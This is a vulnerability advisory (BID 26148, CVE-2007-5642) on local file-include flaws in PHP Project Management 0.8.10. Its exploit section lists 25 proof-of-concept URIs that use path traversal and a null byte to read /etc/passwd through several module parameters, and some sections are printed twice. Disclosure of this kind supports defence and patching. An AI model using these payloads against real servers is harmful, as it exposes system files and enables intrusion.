PHP Project Management Multiple Local File Include Vulnerabilities
BID:26148
Info
PHP Project Management Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 26148 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5642 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 21 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | GoLd_M discovered these vulnerabilities. |
| Vulnerable: |
PHP Project Management PHP Project Management 0.8.10 |
| Not Vulnerable: | |
Discussion
PHP Project Management Multiple Local File Include Vulnerabilities
PHP Project Management is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process.
These issues affect PHP Project Management 0.8.10 and prior versions.
PHP Project Management is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process.
These issues affect PHP Project Management 0.8.10 and prior versions.
Exploit / POC
PHP Project Management Multiple Local File Include Vulnerabilities
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/modules/certinfo/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/emails/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/events/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/fax/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/files/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/files/list.php?def_lang=../../../../../../../../../etc/passwd%00
http://www.example.com/modules/groupadm/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/history/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/info/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/log/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/mail/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/messages/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/organizations/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/phones/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/presence/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/projects/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/projects/summary.inc.php?m_path=../../../../../../etc/passwd%00
http://www.example.com/modules/projects/list.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/reports/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/search/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/snf/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/syslog/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/tasks/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/tasks/summary.inc.php?m_path=../../../../../../etc/passwd%00
http://www.example.com/modules/useradm/index.php?module=../../../../../../etc/passwd%00
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/modules/certinfo/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/emails/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/events/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/fax/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/files/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/files/list.php?def_lang=../../../../../../../../../etc/passwd%00
http://www.example.com/modules/groupadm/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/history/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/info/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/log/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/mail/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/messages/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/organizations/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/phones/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/presence/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/projects/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/projects/summary.inc.php?m_path=../../../../../../etc/passwd%00
http://www.example.com/modules/projects/list.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/reports/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/search/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/snf/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/syslog/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/tasks/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/tasks/summary.inc.php?m_path=../../../../../../etc/passwd%00
http://www.example.com/modules/useradm/index.php?module=../../../../../../etc/passwd%00
Solution / Fix
PHP Project Management Multiple Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHP Project Management Multiple Local File Include Vulnerabilities
References:
References:
- PHP Project Management Homepage (PHP Project Management)
- PHP Project Management SourceForge Page (PHP Project Management)